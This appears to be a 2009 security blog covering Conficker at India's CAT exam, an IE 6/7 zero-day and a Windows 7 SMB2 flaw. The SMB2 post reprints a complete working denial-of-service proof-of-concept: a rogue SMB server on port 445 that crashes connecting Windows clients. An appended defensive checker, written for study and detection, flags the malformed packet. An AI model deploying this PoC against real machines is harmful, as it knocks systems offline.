Monday, 30 November 2009

Conficker attacks major Indian admission test

According to some major reports, the Conficker attack caused huge chaos and resulted in the cancellation of India's major MBA admission test, the CAT (Common Admission Test). The computers are said to have been infected with the Conficker and W32/Nimda viruses.

The test centres were shut down because of the infection, causing huge disruption to the many students sitting the test. This event clearly shows a lack of cyber-security awareness on the part of the IT team. Since Conficker exploits MS08-067, the affected systems had evidently not been updated with the latest Microsoft patches.
This incident is a clear example of how ignoring cyber security can affect established infrastructure.

Monday, 23 November 2009

IE 7 "getElementsByTagName()" Vulnerability

Symantec has confirmed an IE zero-day exploit for versions 6 and 7. The attack can be used to compromise a vulnerable system. The issue lies in the Microsoft HTML Viewer (mshtml.dll): when retrieving certain CSS it can crash the browser or execute arbitrary shellcode, giving the attacker access to the system.

The exploit code can be found here. The workaround for this vulnerability is to update Microsoft Internet Explorer to version 8 or to follow this mitigation technique.

Sunday, 15 November 2009

Zero day Vulnerability in Windows 7

Windows 7 has not been released for very long, and we already have a Microsoft-confirmed zero-day vulnerability.
It was first reported by a security researcher. The bug is in the SMB (Server Message Block) protocol, which is used for network file and print sharing services. When exploited, the vulnerability can result in a total lock-up of the system, which then requires a restart to regain control.
Laurent Gaffié, the researcher who discovered this flaw, says that the exploit can be launched from a compromised computer within a network, or via Internet Explorer, by building a rogue packet.

The full proof-of-concept exploit code was published on the Full Disclosure mailing list.
***********************************************************************************
# Python 2 (SocketServer module, print statement)
#Author: Laurent Gaffié
#

import SocketServer

# Malformed SMB2 NEGOTIATE response. The 4-byte NetBIOS session header declares
# a body length of 0x9a, while the SMB2 body that follows is 0x9e bytes long
# (the author's own note: "length should be 9e not 9a").
packet = ("\x00\x00\x00\x9a"
          "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        # Log the connecting client, read its request, reply with the packet
        print "Who:", self.client_address
        data = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445
launch.serve_forever()
***********************************************************************************
Microsoft has yet to provide a patch for this, so all users are advised to block TCP ports 445 and 139 unless they are really necessary.
Only Windows 7 and Windows Server 2008 are affected by this.
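As an added example from the defensive side (not part of this post or of Gaffié's PoC), a small Python 3 checker that applies the sanity test the PoC's own comment hints at: the NetBIOS session length must match the bytes actually received, and the SMB2 header fields must be coherent. The sample frames below are constructed; the field layout follows MS-SMB2 and the NetBIOS session service header.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # header Flags bit: message is a response

def netbios_frame(body, declared_length=None):
    """Prefix body with a NetBIOS session-message header (type 0x00 + 3-byte
    big-endian length). declared_length lets a test build a header that lies."""
    n = len(body) if declared_length is None else declared_length
    return b"\x00" + struct.pack(">I", n)[1:] + body

def smb2_negotiate_response_header():
    """Constructed 64-byte SMB2 header for a NEGOTIATE response (MS-SMB2 2.2.1)."""
    return struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0,
                       SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR,
                       0, 0, 0, 0, 0, b"\x00" * 16)

def check_smb2_response(data):
    """Return a list of anomalies found in a NetBIOS-framed SMB2 response."""
    findings = []
    if len(data) < 4:
        return ["truncated NetBIOS session header"]
    declared = struct.unpack(">I", b"\x00" + data[1:4])[0]
    actual = len(data) - 4
    if declared != actual:
        findings.append("NetBIOS length %#x != actual body length %#x"
                        % (declared, actual))
    body = data[4:]
    if len(body) < 64 or body[:4] != SMB2_MAGIC:
        findings.append("missing or short SMB2 header")
        return findings
    struct_size, _, _, command, _, flags = struct.unpack_from("<HHIHHI", body, 4)
    if struct_size != 64:
        findings.append("SMB2 StructureSize %d != 64" % struct_size)
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        findings.append("response flag not set")
    if command != SMB2_NEGOTIATE:
        findings.append("unexpected command %#x" % command)
    return findings

# Constructed sample: 64-byte header + 94-byte NEGOTIATE response body = 0x9e bytes
SAMPLE_BODY = smb2_negotiate_response_header() + b"\x41\x00" + b"\x00" * 92
GOOD_FRAME = netbios_frame(SAMPLE_BODY)        # header declares 0x9e: consistent
BAD_FRAME = netbios_frame(SAMPLE_BODY, 0x9a)   # header declares 0x9a: the PoC's mismatch

if __name__ == "__main__":
    for name, frame in (("good", GOOD_FRAME), ("bad", BAD_FRAME)):
        print(name, check_smb2_response(frame) or "ok")
```

The same check can be run over SMB2 responses captured at a network boundary, which is where blocking 445/139 (as the post recommends) would otherwise be the only control.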